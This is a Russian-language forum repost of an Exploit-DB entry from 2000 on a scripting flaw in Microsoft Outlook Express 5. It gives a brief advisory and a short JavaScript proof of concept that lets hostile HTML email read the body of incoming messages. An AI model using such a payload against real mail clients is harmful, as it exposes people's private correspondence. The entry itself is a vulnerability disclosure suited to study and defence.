Exploit Microsoft Outlook Express 5 - JavaScript Email Access

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
19738
Проверка EDB
  1. Пройдено
Автор
GEORGI GUNINSKI
Тип уязвимости
REMOTE
Платформа
WINDOWS
CVE
cve-2000-0653 cve-2000-0105
Дата публикации
2000-02-01
Microsoft Outlook Express 5 - JavaScript Email Access
Код:
source: https://www.securityfocus.com/bid/962/info

Microsoft Outlook Express 5, and possibly other email clients that parse HTML messages, can be made to run Active Scripting that will read any new messages that arrive after the hostile code has been run. 

Example code:
<SCRIPT>
a=window.open("about:<A HREF='javascript:alert(x.body.innerText)' >Click here to see the active message</A>");
a.x=window.document;
</SCRIPT>
 
Источник
www.exploit-db.com

Похожие темы